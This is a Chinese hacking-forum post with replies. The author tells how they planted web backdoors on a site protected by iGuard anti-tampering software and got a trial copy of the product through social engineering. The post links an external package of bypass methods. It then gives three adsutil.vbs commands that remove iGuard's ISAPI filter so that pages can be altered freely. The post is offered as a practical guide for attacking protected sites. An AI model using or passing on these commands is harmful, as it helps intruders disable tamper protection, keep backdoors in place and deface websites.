发新话题
打印

[原创]8种方法突破iGuard网页防篡改软件保护

[原创]8种方法突破iGuard网页防篡改软件保护

前段时间在搞一个受到网页防篡改保护的网站,之前不知道有这东西,后来在植入web后门的时候,老是被删掉,郁闷...
    困扰了整整一天后,在翻看C盘时,发现根目录下一个奇怪的文件夹"Tercel",找了几个文件研究,才知道这里有一个叫iGuard的网页防篡改...汗死..不懂这东西,立即google恶补下,找到官网,居然不提供下载,囧~~
    不过,根据我的经验,不提供下载的软件基本上都会有一堆毛病,哈哈...
    之后通过社工骗取了一套试用版,接下来的2天里,通过在虚拟机中反复测试,终于把这东西的原理摸熟了,并找到8种办法突破iGuard的保护,其中有几种不用管理员权限就能突破.2天的成果,分享出来让后来者少走弯路,以后再遇到这种系统保护的网站要绕过它就轻车熟路了.
    这里先简单说下iGuard的原理,这东西会在IIS/Apache中安插一个ISAPI过滤器(ISAPI Filter)/Apache模块,这个模块对你请求的每一个网页都计算一下它的MD5值,然后跟自己MD5库中记录的进行比较,如果一致就说明没有篡改,放行通过,如果不一致,就拦截,并立即恢复网页(这也是为什么之前我在网页中插入后门,然后访问后门,就会立即被删除的原因).
    OK,知己知彼,百战不殆,在理解了它的原理后,要对付它就容易多了,何况这个iGuard设计上就有众多安全隐患.
    因为突破方法比较多,所以我打包成一个rar(视频+文字解说).
    邪8这里上传15MB的附件老是出错,郁闷,没法子,只好放过地方了,下载地址:
    http://www.vdisk.cn/user/admin/tempuser1377003355

    如果比较懒,不想看详细视频演示资料,可以直接用下面的这个方法让iGuard失效:

    原理:因为iGuard 数字水印检测功能的实现,完全依赖于一个 ISAPI 筛选器模块,只要把这个筛选器删除,就可以让篡改网页随意留出了...不管这个iGuard是不是双机部署,不管采取什么水印,立刻统统失效.

    操作:用下面三条cmd命令,就可以把iGuard的 ISAPI 筛选器模块删掉.
复制内容到剪贴板
代码:
//cmd 查找 iGuard 的 ISAPI 筛选器模块,同时获取网站ID...
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs enum_all w3svc /p | find "iguard" /i

//cmd 获取指定网站的 FilterLoadOrder 序列...
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs get w3svc/xxx/filters/FilterLoadOrder

//cmd 设置新的 FilterLoadOrder 序列到指定网站...
cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set w3svc/xxx/filters/FilterLoadOrder ""
删除iGuard的 ISAPI 筛选器模块后,咱们就可以随意修改网页了,hoho~~

[ 本帖最后由 taiwansee 于 2013-8-21 08:52 编辑 ]
夫学须静也,才须学也,非学无以广才,非志无以成学。淫慢则不能励精,险躁则不能治性。年与时驰,意与日去,遂成枯落,多不接世,悲守穷庐,将复何及!

TOP

这样也可以。。。

TOP

感谢楼主分享!!!!!

TOP

发新话题